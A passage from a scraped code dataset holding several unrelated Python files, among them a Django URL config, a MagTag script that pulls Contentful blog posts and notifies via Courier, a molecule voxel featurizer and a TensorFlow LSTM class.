compute_output_shape(self, input_shape):\n return tf.keras.backend.int_shape(self.result)","repo_name":"Skwoogey/TinyNet","sub_path":"ContrastiveCenterLossLayer.py","file_name":"ContrastiveCenterLossLayer.py","file_ext":"py","file_size_in_byte":3875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31434395207","text":"from django.urls import path, re_path\n\nfrom content.views import comments, my_comment, my_comments, VideoContentsViewSet, VideoContentViewSet, \\\n MyVideoContentViewSet, MyVideoContentsViewSet, PlaylistViewSet, MyPlaylistsViewSet\n\nurlpatterns = [\n path('contents', VideoContentsViewSet.as_view({\n 'get': 'list',\n \"post\": 'create'\n })),\n path('contents/me', MyVideoContentsViewSet.as_view({\n 'get': 'list'\n })),\n path('contents/me/', MyVideoContentViewSet.as_view({\n 'get': 'retrieve',\n \"put\": 'update',\n 'delete': 'destroy'\n })),\n path('contents/', VideoContentViewSet.as_view({\n 'get': 'retrieve'\n })),\n re_path(r'^contents/(?P\\w+)/save(?:undo=(?P\\d+))?$',\n VideoContentViewSet.as_view({'put': 'save'})),\n re_path(r'^contents/(?P\\w+)/like(?:dislike=(?P\\d+)&retract=(?P\\d+))?$',\n VideoContentViewSet.as_view({'put': 'like'})),\n path('contents//like/status', VideoContentViewSet.as_view({'get': 'like_status'})),\n path('contents//comments', comments),\n path('contents//comments/me', my_comments),\n path('contents//comments/me/', my_comment),\n path('playlists', PlaylistViewSet.as_view({'post': 'create'})),\n path('playlists/', PlaylistViewSet.as_view({'get': 'retrieve'})),\n re_path(r'^playlists/(?P\\d+)/save(?:undo=(?P\\d+))?$',\n PlaylistViewSet.as_view({'put': 'save'})),\n path('playlists/me', MyPlaylistsViewSet.as_view({'get': 'list'})),\n path('playlists/me/', MyPlaylistsViewSet.as_view({\n 'get': 'retrieve',\n 'put': 'update',\n 'delete': 'destroy'\n }))\n]\n","repo_name":"Aldeshov/youtube.api","sub_path":"content/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"40071431066","text":"import os\nfrom glob import glob\nfrom setuptools import setup\nfrom setuptools import find_packages\n\n\n\npackage_name = 'drone_model'\n\nsetup(\n name=package_name,\n version='0.0.0',\n packages=[package_name],\n data_files=[\n ('share/ament_index/resource_index/packages',\n ['resource/' + package_name]),\n ('share/' + package_name, ['package.xml']),\n (os.path.join('share', package_name), glob('launch/*.py')),\n (os.path.join('share', package_name, \"urdf\"), glob('urdf/*')),\n ],\n install_requires=['setuptools'],\n zip_safe=True,\n maintainer='root',\n maintainer_email='christian.peeren@rwth-aachen.de',\n description='TODO: Package description',\n license='TODO: License declaration',\n tests_require=['pytest'],\n entry_points={\n 'console_scripts': [\n 'propeller = drone_model.propeller:main',\n 'propellerSingle = drone_model.propellerSingle:main',\n 'controller = drone_model.controller:main',\n ],\n },\n)\n","repo_name":"cmb87/project-arm","sub_path":"droneAndOtherMixedStuff/server/src/drone_model/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20909275200","text":"import time\nimport gc\nimport wifi\nimport random\nimport adafruit_requests\nimport ssl\nimport socketpool\nimport terminalio\nfrom adafruit_magtag.magtag import 
MagTag\n\nmagtag = MagTag()\n\n# Add a secrets.py to your filesystem that has a dictionary called secrets with \"ssid\" and\n# \"password\" keys with your WiFi credentials. DO NOT share that file or commit it into Git or other\n# source control.\n# pylint: disable=no-name-in-module,wrong-import-order\ntry:\n from secrets import secrets\nexcept ImportError:\n print(\"Credentials and tokens are kept in secrets.py, please add them there!\")\n raise\n\nprint(\"Connecting to %s\" % secrets[\"ssid\"])\nwifi.radio.connect(secrets[\"ssid\"], secrets[\"password\"])\nprint(\"Connected to %s!\" % secrets[\"ssid\"])\n\npool = socketpool.SocketPool(wifi.radio)\nrequests = adafruit_requests.Session(pool, ssl.create_default_context())\n\nendpoint = \"https://graphql.contentful.com/content/v1/spaces/%s/\" % (\n secrets[\"space_id\"]\n)\nheaders = {\"Authorization\": \"Bearer %s\" % (secrets[\"CDA_token\"])}\n\n# Get Dev Blog Posts\nquery = \"\"\"query {\n blogPostCollection {\n items {\n sys {\n id\n }\n }\n }\n}\"\"\"\n\nprint(\"Making blog post collection query.\")\nresponse = requests.post(endpoint, json={\"query\": query}, headers=headers)\n\n# Get Individual Post\nquery = \"\"\"{\n blogPost(id: \\\"%s\\\") {\n title\n publishDate\n slug\n authorsCollection {\n items {\n name\n }\n }\n introduction\n }\n}\n\"\"\" % (\n random.choice(response.json()[\"data\"][\"blogPostCollection\"][\"items\"])[\"sys\"][\"id\"]\n)\n\nprint(\"Making blog post query.\")\nresponse = requests.post(endpoint, json={\"query\": query}, headers=headers)\n\n# Formatting for the title text\nmagtag.add_text(\n text_font=\"/fonts/Lato-Bold-ltd-25.bdf\",\n text_position=(10, 15),\n)\nmagtag.set_text(response.json()[\"data\"][\"blogPost\"][\"title\"], auto_refresh=False)\n\n# Formatting for the author text\nmagtag.add_text(\n text_font=\"/fonts/Arial-Bold-12.pcf\",\n text_position=(10, 38),\n)\n\nauthor_string = \"\"\nfor author in response.json()[\"data\"][\"blogPost\"][\"authorsCollection\"][\"items\"]:\n if author_string == \"\":\n author_string = author[\"name\"]\n else:\n author_string = author_string + \" & \" + author[\"name\"]\n\nmagtag.set_text(\n val=author_string,\n index=1,\n auto_refresh=False,\n)\n\n# Formatting for the publish date\nmagtag.add_text(\n text_font=\"/fonts/Arial-12.bdf\",\n text_position=(10, 60),\n)\n\nyear = int(response.json()[\"data\"][\"blogPost\"][\"publishDate\"][0:4])\nmonth = int(response.json()[\"data\"][\"blogPost\"][\"publishDate\"][5:7])\nday = int(response.json()[\"data\"][\"blogPost\"][\"publishDate\"][8:10])\n\nmonths = [\n \"January\",\n \"February\",\n \"March\",\n \"April\",\n \"May\",\n \"June\",\n \"July\",\n \"August\",\n \"September\",\n \"October\",\n \"November\",\n \"December\",\n]\n\nstrdate = \"Published %s %d, %s\" % (months[month - 1], day, year)\nprint(strdate)\n\nslug = response.json()[\"data\"][\"blogPost\"][\"slug\"]\n\nblog_url = f\"https://www.contentful.com/blog/{year}/{month:02}/{day:02}/{slug}/\"\n\nmagtag.set_text(val=strdate, index=2, auto_refresh=False)\n# Formatting for the introduction text\nmagtag.add_text(\n text_font=terminalio.FONT,\n text_position=(10, 94),\n line_spacing=0.8,\n text_wrap=47, # wrap text at this count\n)\n\nmagtag.set_text(\n val=response.json()[\"data\"][\"blogPost\"][\"introduction\"][0:170] + \"...\",\n index=3,\n)\n\nendpoint = \"https://api.courier.com/send/\"\nheaders[\"Authorization\"] = \"Bearer %s\" % (secrets[\"courier_token\"])\nheaders[\"Accept\"] = \"application/json\"\nheaders[\"Content-Type\"] = 
\"application/json\"\n\ncourier_JSON = {\n \"event\": \"MAGTAG_NOTIFICATION\",\n \"recipient\": \"discord_channel\",\n \"data\": {\n \"title\": response.json()[\"data\"][\"blogPost\"][\"title\"],\n \"introduction\": response.json()[\"data\"][\"blogPost\"][\"introduction\"][0:170]\n + \"...\",\n \"url\": blog_url,\n \"author\": author_string,\n \"publish_date\": strdate,\n },\n}\n\nbutton_colors = ((255, 0, 0), (255, 150, 0), (0, 255, 255), (180, 0, 255))\nbutton_tones = (1047, 1318, 1568, 2093)\n\nbutton_a_pressed = False\n\nprint(\"Starting the loop, go ahead and press some buttons. :)\")\nwhile True:\n if magtag.peripherals.button_a_pressed:\n if button_a_pressed == False:\n for i, b in enumerate(magtag.peripherals.buttons):\n magtag.peripherals.neopixel_disable = False\n magtag.peripherals.neopixels[i] = button_colors[i]\n time.sleep(0.25)\n magtag.peripherals.neopixels[i] = (0, 0, 0)\n print(\"Making request to Courier\")\n response = requests.post(endpoint, json=courier_JSON, headers=headers)\n button_a_pressed = True\n print(\"Courier response: \")\n print(response.json())\n\n if magtag.peripherals.button_d_pressed:\n for i, b in enumerate(magtag.peripherals.buttons):\n magtag.peripherals.neopixel_disable = False\n magtag.peripherals.neopixels[i] = button_colors[i]\n time.sleep(0.25)\n magtag.peripherals.neopixels[i] = (0, 0, 0)\n # magtag.peripherals.play_tone(button_tones[i], 0.25)\n else:\n button_a_pressed = False\n magtag.peripherals.neopixel_disable = True\npass\n","repo_name":"Shy/MagTag-Contentful-Courier","sub_path":"src/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":5240,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"14721586603","text":"\nimport numpy as np\nimport pandas as pd\nimport re\nimport numpy as np\nimport rdkit\nfrom rdkit import Chem\nimport os\nimport pybel\nimport tqdm\nimport argparse\nimport math\nimport torch\n\nvoc_set=['pad', 'bos', 'eos', '5', 'Y', ')', 'Z', '[', ']', '-', \n 'S', '1', 'O', 'N', \"'\", ' ', 'C', '(', 'n', 'c', '#', 's', '6', \n 'X', '4', ',', '2', 'o', 'F', '=', '3', '.', 'I', '/', '+', '\\\\', '@', 'H', 'P']\n# voc_set=['pad', 'bos', 'eos', 'Y', '-', 'o', '[', ' ', 'N', 'P', '1', 's', '8', '7', '(', '5', \n# 'C', '3', 'X', 'n', 'Z', 'c', 'H', '+', ',', ')', \"'\", 'S', 'O', '4', ']', '#', '2', 'I', 'F', '=', '6','9','@'] \nvocab_i2c_v1 = {i: x for i, x in enumerate(voc_set)}\nvocab_c2i_v1 = {vocab_i2c_v1[i]: i for i in vocab_i2c_v1}\n\nclass Featurizer():\n \"\"\"\n This class scirpt is highly referenced to tfbio\n https://gitlab.com/cheminfIBB/tfbio\n Calcaulates atomic features for molecules. 
Features can encode atom type,\n native pybel properties or any property defined with SMARTS patterns\n \"\"\"\n def __init__(self, atom_codes=None, atom_labels=None,\n named_properties=None, save_molecule_codes=True,\n custom_properties=None, smarts_properties=None,\n smarts_labels=None):\n\n # Remember namse of all features in the correct order\n self.FEATURE_NAMES = []\n\n if atom_codes is not None:\n if not isinstance(atom_codes, dict):\n raise TypeError('Atom codes should be dict, got %s instead'\n % type(atom_codes))\n codes = set(atom_codes.values())\n for i in range(len(codes)):\n if i not in codes:\n raise ValueError('Incorrect atom code %s' % i)\n\n self.NUM_ATOM_CLASSES = len(codes)\n self.ATOM_CODES = atom_codes\n if atom_labels is not None:\n if len(atom_labels) != self.NUM_ATOM_CLASSES:\n raise ValueError('Incorrect number of atom labels: '\n '%s instead of %s'\n % (len(atom_labels), self.NUM_ATOM_CLASSES))\n else:\n atom_labels = ['atom%s' % i for i in range(self.NUM_ATOM_CLASSES)]\n self.FEATURE_NAMES += atom_labels\n else:\n self.ATOM_CODES = {}\n\n metals = ([3, 4, 11, 12, 13] + list(range(19, 32))\n + list(range(37, 51)) + list(range(55, 84))\n + list(range(87, 104)))\n\n # List of tuples (atomic_num, class_name) with atom types to encode.\n atom_classes = [\n (5, 'B'),\n (6, 'C'),\n (7, 'N'),\n (8, 'O'),\n (15, 'P'),\n (16, 'S'),\n (34, 'Se'),\n ([9, 17, 35, 53], 'halogen'),\n (metals, 'metal')\n ]\n\n for code, (atom, name) in enumerate(atom_classes):\n if type(atom) is list:\n for a in atom:\n self.ATOM_CODES[a] = code\n else:\n self.ATOM_CODES[atom] = code\n self.FEATURE_NAMES.append(name)\n\n self.NUM_ATOM_CLASSES = len(atom_classes)\n\n if named_properties is not None:\n if not isinstance(named_properties, (list, tuple, np.ndarray)):\n raise TypeError('named_properties must be a list')\n allowed_props = [prop for prop in dir(pybel.Atom)\n if not prop.startswith('__')]\n for prop_id, prop in enumerate(named_properties):\n if prop not in allowed_props:\n raise ValueError(\n 'named_properties must be in pybel.Atom attributes,'\n ' %s was given at position %s' % (prop_id, prop)\n )\n self.NAMED_PROPS = named_properties\n else:\n # pybel.Atom properties to save\n self.NAMED_PROPS = ['hyb', 'heavyvalence', 'heterovalence',\n 'partialcharge']\n self.FEATURE_NAMES += self.NAMED_PROPS\n\n if not isinstance(save_molecule_codes, bool):\n raise TypeError('save_molecule_codes should be bool, got %s '\n 'instead' % type(save_molecule_codes))\n self.save_molecule_codes = save_molecule_codes\n if save_molecule_codes:\n # Remember if an atom belongs to the ligand or to the protein\n self.FEATURE_NAMES.append('molcode')\n\n self.CALLABLES = []\n if custom_properties is not None:\n for i, func in enumerate(custom_properties):\n if not callable(func):\n raise TypeError('custom_properties should be list of'\n ' callables, got %s instead' % type(func))\n name = getattr(func, '__name__', '')\n if name == '':\n name = 'func%s' % i\n self.CALLABLES.append(func)\n self.FEATURE_NAMES.append(name)\n\n if smarts_properties is None:\n # SMARTS definition for other properties\n self.SMARTS = [\n '[#6+0!$(*~[#7,#8,F]),SH0+0v2,s+0,S^3,Cl+0,Br+0,I+0]',\n '[a]',\n '[!$([#1,#6,F,Cl,Br,I,o,s,nX3,#7v5,#15v5,#16v4,#16v6,*+1,*+2,*+3])]',\n '[!$([#6,H0,-,-2,-3]),$([!H0;#7,#8,#9])]',\n '[r]'\n ]\n smarts_labels = ['hydrophobic', 'aromatic', 'acceptor', 'donor',\n 'ring']\n elif not isinstance(smarts_properties, (list, tuple, np.ndarray)):\n raise TypeError('smarts_properties must be a list')\n else:\n 
self.SMARTS = smarts_properties\n\n        if smarts_labels is not None:\n            if len(smarts_labels) != len(self.SMARTS):\n                raise ValueError('Incorrect number of SMARTS labels: %s'\n                                 ' instead of %s'\n                                 % (len(smarts_labels), len(self.SMARTS)))\n        else:\n            smarts_labels = ['smarts%s' % i for i in range(len(self.SMARTS))]\n\n        # Compile patterns\n        self.compile_smarts()\n        self.FEATURE_NAMES += smarts_labels\n\n    def compile_smarts(self):\n        self.__PATTERNS = []\n        for smarts in self.SMARTS:\n            self.__PATTERNS.append(pybel.Smarts(smarts))\n\n    def encode_num(self, atomic_num):\n        \"\"\"Encode atom type with a binary vector. If atom type is not included in\n        the `atom_classes`, its encoding is an all-zeros vector.\n        \"\"\"\n\n        if not isinstance(atomic_num, int):\n            raise TypeError('Atomic number must be int, %s was given'\n                            % type(atomic_num))\n\n        encoding = np.zeros(self.NUM_ATOM_CLASSES)\n        try:\n            encoding[self.ATOM_CODES[atomic_num]] = 1.0\n        except KeyError:\n            pass\n        return encoding\n\n    def find_smarts(self, molecule):\n        \"\"\"Find atoms that match SMARTS patterns.\n        \"\"\"\n\n        if not isinstance(molecule, pybel.Molecule):\n            raise TypeError('molecule must be pybel.Molecule object, %s was given'\n                            % type(molecule))\n\n        features = np.zeros((len(molecule.atoms), len(self.__PATTERNS)))\n\n        for (pattern_id, pattern) in enumerate(self.__PATTERNS):\n            atoms_with_prop = np.array(list(*zip(*pattern.findall(molecule))),\n                                       dtype=int) - 1\n            features[atoms_with_prop, pattern_id] = 1.0\n        return features\n\n    def get_features(self, molecule, molcode=None):\n        \"\"\"Get coordinates and features for all heavy atoms in the molecule.\n        \"\"\"\n\n        if not isinstance(molecule, pybel.Molecule):\n            raise TypeError('molecule must be pybel.Molecule object,'\n                            ' %s was given' % type(molecule))\n        if molcode is None:\n            if self.save_molecule_codes is True:\n                raise ValueError('save_molecule_codes is set to True,'\n                                 ' you must specify code for the molecule')\n        elif not isinstance(molcode, (float, int)):\n            raise TypeError('molcode must be float, %s was given'\n                            % type(molcode))\n\n        coords = []\n        features = []\n        heavy_atoms = []\n\n        for i, atom in enumerate(molecule):\n            # ignore hydrogens and dummy atoms (they have atomicnum set to 0)\n            # print('atom:',atom)\n            # print('atom.atomicnum:',atom.atomicnum)\n            if atom.atomicnum > 1:\n                heavy_atoms.append(i)\n                coords.append(atom.coords)\n\n                features.append(np.concatenate((\n                    self.encode_num(atom.atomicnum),\n                    [atom.__getattribute__(prop) for prop in self.NAMED_PROPS],\n                    [func(atom) for func in self.CALLABLES],\n                )))\n\n        coords = np.array(coords, dtype=np.float32)\n        features = np.array(features, dtype=np.float32)\n        if self.save_molecule_codes:\n            features = np.hstack((features,\n                                  molcode * np.ones((len(features), 1))))\n        features = np.hstack([features,\n                              self.find_smarts(molecule)[heavy_atoms]])\n\n        if np.isnan(features).any():\n            raise RuntimeError('Got NaN when calculating features')\n\n        return coords, features\n\n\ndef rotation_matrix(axis, theta):\n    \"\"\"Counterclockwise rotation about a given axis by theta radians\"\"\"\n\n    if not isinstance(axis, (np.ndarray, list, tuple)):\n        raise TypeError('axis must be an array of floats of shape (3,)')\n    try:\n        axis = np.asarray(axis, dtype=float)\n    except ValueError:\n        raise ValueError('axis must be an array of floats of shape (3,)')\n\n    if axis.shape != (3,):\n        raise ValueError('axis must be an array of floats of shape (3,)')\n\n    if not isinstance(theta, (float, int)):\n        raise TypeError('theta must be a float')\n\n    axis = axis / sqrt(np.dot(axis, axis))\n    a = cos(theta / 
2.0)\n    b, c, d = -axis * sin(theta / 2.0)\n    aa, bb, cc, dd = a * a, b * b, c * c, d * d\n    bc, ad, ac, ab, bd, cd = b * c, a * d, a * c, a * b, b * d, c * d\n    return np.array([[aa + bb - cc - dd, 2 * (bc + ad), 2 * (bd - ac)],\n                     [2 * (bc - ad), aa + cc - bb - dd, 2 * (cd + ab)],\n                     [2 * (bd + ac), 2 * (cd - ab), aa + dd - bb - cc]])\n\n\n# Create matrices for all possible 90 degree rotations of a box, at module\n# level so that rotate() below can reach them via 'global ROTATIONS'.\nROTATIONS = [rotation_matrix([1, 1, 1], 0)]\n\n# about X, Y and Z - 9 rotations\nfor a1 in range(3):\n    for t in range(1, 4):\n        axis = np.zeros(3)\n        axis[a1] = 1\n        theta = t * pi / 2.0\n        ROTATIONS.append(rotation_matrix(axis, theta))\n\n# about each face diagonal - 6 rotations\nfor (a1, a2) in combinations(range(3), 2):\n    axis = np.zeros(3)\n    axis[[a1, a2]] = 1.0\n    theta = pi\n    ROTATIONS.append(rotation_matrix(axis, theta))\n    axis[a2] = -1.0\n    ROTATIONS.append(rotation_matrix(axis, theta))\n\n# about each space diagonal - 8 rotations\nfor t in [1, 2]:\n    theta = t * 2 * pi / 3\n    axis = np.ones(3)\n    ROTATIONS.append(rotation_matrix(axis, theta))\n    for a1 in range(3):\n        axis = np.ones(3)\n        axis[a1] = -1\n        ROTATIONS.append(rotation_matrix(axis, theta))\n\n\ndef rotate(coords, rotation):\n    \"\"\"Rotate coordinates by a given rotation\n    \"\"\"\n\n    global ROTATIONS\n\n    if not isinstance(coords, (np.ndarray, list, tuple)):\n        raise TypeError('coords must be an array of floats of shape (N, 3)')\n    try:\n        coords = np.asarray(coords, dtype=float)\n    except ValueError:\n        raise ValueError('coords must be an array of floats of shape (N, 3)')\n    shape = coords.shape\n    if len(shape) != 2 or shape[1] != 3:\n        raise ValueError('coords must be an array of floats of shape (N, 3)')\n\n    if isinstance(rotation, int):\n        if rotation >= 0 and rotation < len(ROTATIONS):\n            return np.dot(coords, ROTATIONS[rotation])\n        else:\n            raise ValueError('Invalid rotation number %s!' % rotation)\n    elif isinstance(rotation, np.ndarray) and rotation.shape == (3, 3):\n        return np.dot(coords, rotation)\n\n    else:\n        raise ValueError('Invalid rotation %s!' % rotation)\n\n\n# TODO: add make_grid variant for GPU\nfeaturizer = Featurizer()\ndef make_grid(coords, features, grid_resolution=1.0, max_dist=7.5):\n    \"\"\"Convert atom coordinates and features represented as 2D arrays into a\n    fixed-sized 3D box.\n\n    
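A minimal doctest-style sketch (a single dummy atom at the origin with one\n    feature; the default box is 16 cells per side):\n\n    >>> make_grid(np.zeros((1, 3)), np.ones((1, 1))).shape\n    (1, 16, 16, 16, 1)\n\n    Returns\n    -------\n    coords: np.ndarray, shape = (M, M, M, F)\n        4D array with atom properties distributed in 3D space. 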
M is equal to\n 2 * `max_dist` / `grid_resolution` + 1\n \"\"\"\n\n try:\n coords = np.asarray(coords, dtype=np.float64)\n except ValueError:\n raise ValueError('coords must be an array of floats of shape (N, 3)')\n c_shape = coords.shape\n if len(c_shape) != 2 or c_shape[1] != 3:\n raise ValueError('coords must be an array of floats of shape (N, 3)')\n\n N = len(coords)\n try:\n features = np.asarray(features, dtype=np.float64)\n except ValueError:\n raise ValueError('features must be an array of floats of shape (N, F)')\n f_shape = features.shape\n if len(f_shape) != 2 or f_shape[0] != N:\n raise ValueError('features must be an array of floats of shape (N, F)')\n\n if not isinstance(grid_resolution, (float, int)):\n raise TypeError('grid_resolution must be float')\n if grid_resolution <= 0:\n raise ValueError('grid_resolution must be positive')\n\n if not isinstance(max_dist, (float, int)):\n raise TypeError('max_dist must be float')\n if max_dist <= 0:\n raise ValueError('max_dist must be positive')\n\n num_features = f_shape[1]\n max_dist = float(max_dist)\n grid_resolution = float(grid_resolution)\n\n box_size = math.ceil(2 * max_dist / grid_resolution + 1)\n\n # move all atoms to the neares grid point\n grid_coords = (coords + max_dist) / grid_resolution\n grid_coords = grid_coords.round().astype(int)\n\n # remove atoms outside the box\n in_box = ((grid_coords >= 0) & (grid_coords < box_size)).all(axis=1)\n grid = np.zeros((1, box_size, box_size, box_size, num_features),\n dtype=np.float32)\n for (x, y, z), f in zip(grid_coords[in_box], features[in_box]):\n grid[0, x, y, z] += f\n\n return grid\ndef get_3d_grid(input):\n '''\n Generate the 3d grid of nparray format of\n source data (zinc) and target data (binding complexes)\n mode: 1 for target data; 0 for source data \n input: in mode 1, means the the FODER path of pdb complexes(./pdb); \n in mode 0, means the FILES path of smiles (./zinc.csv)\n output: save path of training data (./source.npz)\n pki_path: the FILES path of pkis (./data/pkis.csv) \n'''\n\n charge_column = featurizer.FEATURE_NAMES.index('partialcharge')\n grid_in = []\n # lists = []\n # lists.append(input)\n # i = input\n for i in input:\n i=pybel.readstring('smi',i)\n crds, fea= featurizer.get_features(i,1.0)\n x=make_grid(crds, fea)\n x = np.vstack(x)\n \n x[..., charge_column] /= 0.425\n # print('x.shape:',x.shape)\n # grid_in.append(x)\n # print(len(grid_in))\n grid_in=np.array(x)\n\n # print('grid_in:',grid_in.shape)\n grid_in=grid_in.swapaxes(0,3)\n \n return grid_in\n \n\ndef generate_representation_v1(smile):\n \"\"\"\n Generate voxelized and string representation of a molecule\n \"\"\"\n # Convert smile to 3D structure\n charge_column = featurizer.FEATURE_NAMES.index('partialcharge')\n grid_in = []\n lists = []\n smile_str = list(smile)\n end_token = smile_str.index(2)\n smile_str = \"\".join([vocab_i2c_v1[i] for i in smile_str[1:end_token]])\n smile_str = smile_str.replace(\"X\", \"Cl\").replace(\"Y\", \"[nH]\").replace(\"Z\", \"Br\")\n\n lists=[]\n lists.append(smile_str)\n grid_in = get_3d_grid(lists)\n \n return torch.Tensor(grid_in), torch.Tensor(smile), end_token + 1\n\n\ndef gather_fn(in_data):\n \"\"\"\n Collects and creates a batch.\n \"\"\"\n # Sort a data list by smiles length (descending order)\n in_data.sort(key=lambda x: x[2], reverse=True)\n images, smiles, lengths = zip(*in_data)\n\n images = torch.stack(images, 0) # Stack images\n\n # Merge smiles (from tuple of 1D tensor to 2D tensor).\n # lengths = [len(smile) for smile in smiles]\n 
targets = torch.zeros(len(smiles), max(lengths)).long()\n    for i, smile in enumerate(smiles):\n        end = lengths[i]\n        targets[i, :end] = smile[:end]\n    return images, targets, lengths\n\n\nclass Batch_prep:\n    def __init__(self, n_proc=6, mp_pool=None):\n        if mp_pool:\n            self.mp = mp_pool\n        elif n_proc > 1:\n            self.mp = multiprocessing.Pool(n_proc)\n        else:\n            raise NotImplementedError(\"Use multiprocessing for now!\")\n\n    def transform_data(self, smiles):\n        inputs = self.mp.map(generate_representation_v1, smiles)\n\n        # Sometimes representation generation fails\n        inputs = list(filter(lambda x: x is not None, inputs))\n        return gather_fn(inputs)\n\n\ndef queue_datagen(smiles, batch_size=32, n_proc=12, mp_pool=None):\n    \"\"\"\n    Continuously produce representations.\n    \"\"\"\n    n_batches = math.ceil(len(smiles) / batch_size)\n    sh_indices = np.arange(len(smiles))\n\n    my_batch_prep = Batch_prep(n_proc=n_proc, mp_pool=mp_pool)\n\n    while True:\n        np.random.shuffle(sh_indices)\n        for i in range(n_batches):\n            batch_idx = sh_indices[i * batch_size:(i + 1) * batch_size]\n            print('smiles[batch_idx]:',smiles[batch_idx].shape)\n            yield my_batch_prep.transform_data(smiles[batch_idx])\n\n","repo_name":"renyongqi529/DNMG","sub_path":"data_generator.py","file_name":"data_generator.py","file_ext":"py","file_size_in_byte":17943,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"2591553350","text":"from court import Court\nfrom typing import Optional\n\n\nclass Stadium(Court):\n    __name: str\n    __common_name: Optional[str]\n    __capacity: int\n\n    def __init__(self, width=68.0, length=150.0, address: str = '', year_built: int = 0, name: str = '',\n                 common_name: Optional[str] = '', capacity: int = 0) -> None:\n        super().__init__(width, length, address, year_built)\n        self.__name = name\n        self.__common_name = common_name\n        if capacity >= 0:\n            self.__capacity = capacity\n        else:\n            self.__capacity = 0\n\n    @property\n    def name(self) -> str:\n        return self.__name\n\n    @name.setter\n    def name(self, value: str) -> None:\n        self.__name = value\n\n    @property\n    def common_name(self) -> str:\n        return self.__common_name\n\n    @common_name.setter\n    def common_name(self, value: str) -> None:\n        self.__common_name = value\n\n    @property\n    def capacity(self) -> int:\n        return self.__capacity\n\n    @capacity.setter\n    def capacity(self, value: int) -> None:\n        self.__capacity = value\n\n    def __eq__(self, other: 'Stadium') -> bool:\n        return self.area() == other.area() and self.capacity == other.capacity\n\n    def __ne__(self, other: 'Stadium') -> bool:\n        # Negation of __eq__; combining the negated conditions with 'and' would\n        # let two stadiums be neither equal nor not-equal.\n        return not self.__eq__(other)\n\n    def __repr__(self):\n        if self.common_name is not None:\n            return f'Boisko wybudowane w roku {self.year_built}, ' \\\n                   f'o długości {self.length} i szerokości {self.width} metrów, ' \\\n                   f'Pole powierzchni: {self.area()} mkw.' \\\n                   f'Adres: {self.address}' \\\n                   f'Nazwa: {self.name}' \\\n                   f'Nazwa zwyczajowa: {self.common_name}' \\\n                   f'Pojemność stadionu: {self.capacity}'\n        else:\n            return f'Boisko wybudowane w roku {self.year_built}, ' \\\n                   f'o długości {self.length} i szerokości {self.width} metrów, ' \\\n                   f'Pole powierzchni: {self.area()} mkw.' 
\\\n                   f'Adres: {self.address}' \\\n                   f'Nazwa: {self.name}' \\\n                   f'Pojemność stadionu: {self.capacity}'\n","repo_name":"HubertBednarczyk/ProgramowanieObiektowe","sub_path":"Cwiczenia/K1-162135/stadium.py","file_name":"stadium.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29427106449","text":"def numero_perfecto(n):\n    c=1\n    sm=0\n    while(c!=n):\n        if(n%c==0):\n            sm=sm+c\n        c=c+1\n    if(sm==n):\n        return True\n    else:\n        return False\n# e.g. numero_perfecto(6) -> True (1 + 2 + 3 == 6), numero_perfecto(8) -> False\nif __name__ == \"__main__\":\n    n=eval(input(\"Ingrese su numero: \"))\n    if(numero_perfecto(n)):\n        print(\"El numero {0} es perfecto\".format(n))\n    else:\n        print(\"El numero {0} no es perfecto\".format(n))","repo_name":"pabloschwarzenberg/grader","sub_path":"tema2_ej3/tema2_ej3_98d2369f77937e21d0d86c004d1355f1.py","file_name":"tema2_ej3_98d2369f77937e21d0d86c004d1355f1.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17994888899","text":"import tensorflow as tf\n\nclass LSTM_timeseries(tf.Module):\n    def __init__(self, nodes_in, units_hidden, nodes_out, n_pred=1):\n        self.units_hidden = units_hidden\n        self.nodes_in = nodes_in\n        self.nodes_out = nodes_out\n        self.n_pred = n_pred\n        \n        self.W_i = tf.Variable(tf.zeros([self.nodes_in, self.units_hidden]),name='w_i') \n        self.U_i = tf.Variable(tf.zeros([self.units_hidden, self.units_hidden]),name='u_i')\n        self.b_i = tf.Variable(tf.zeros([self.units_hidden]),name='b_i')\n        self.W_f = tf.Variable(tf.zeros([self.nodes_in, self.units_hidden]),name='w_f')\n        self.U_f = tf.Variable(tf.zeros([self.units_hidden, self.units_hidden]),name='u_f')\n        self.b_f = tf.Variable(tf.zeros([self.units_hidden]),name='b_f')\n        self.W_o = tf.Variable(tf.zeros([self.nodes_in, self.units_hidden]),name='w_o')\n        self.U_o= tf.Variable(tf.zeros([self.units_hidden, self.units_hidden]),name='u_o')\n        self.b_o = tf.Variable(tf.zeros([self.units_hidden]),name='b_o')\n        self.W_c = tf.Variable(tf.zeros([self.nodes_in, self.units_hidden]),name='w_c')\n        self.U_c = tf.Variable(tf.zeros([self.units_hidden, self.units_hidden]),name='u_c')\n        self.b_c = tf.Variable(tf.zeros([self.units_hidden]),name='b_c')\n        # output layer\n        self.W_ol = tf.Variable(tf.random.truncated_normal([self.units_hidden, self.nodes_out], mean=0, stddev=.01),\n                                name='w_ol')\n        self.b_ol = tf.Variable(tf.random.truncated_normal([self.nodes_out], mean=0, stddev=.01),\n                                name='b_ol')\n    \n    \n    def forward_onestep(self, previous_hidden_memory_tuple, x):\n        # runs one time step\n        previous_hidden_state, c_prev = tf.unstack(previous_hidden_memory_tuple)\n\n        i = tf.sigmoid( tf.matmul(x, self.W_i) +\n                tf.matmul(previous_hidden_state, self.U_i) + self.b_i)\n\n        f = tf.sigmoid( tf.matmul(x, self.W_f) +\n                tf.matmul(previous_hidden_state, self.U_f) + self.b_f)\n\n        o = tf.sigmoid( tf.matmul(x, self.W_o) +\n                tf.matmul(previous_hidden_state, self.U_o) + self.b_o)\n\n        c_ = tf.nn.tanh(tf.matmul(x, self.W_c) +\n                tf.matmul(previous_hidden_state, self.U_c) + self.b_c)\n\n        # Final Memory cell\n        c = f * c_prev + i * 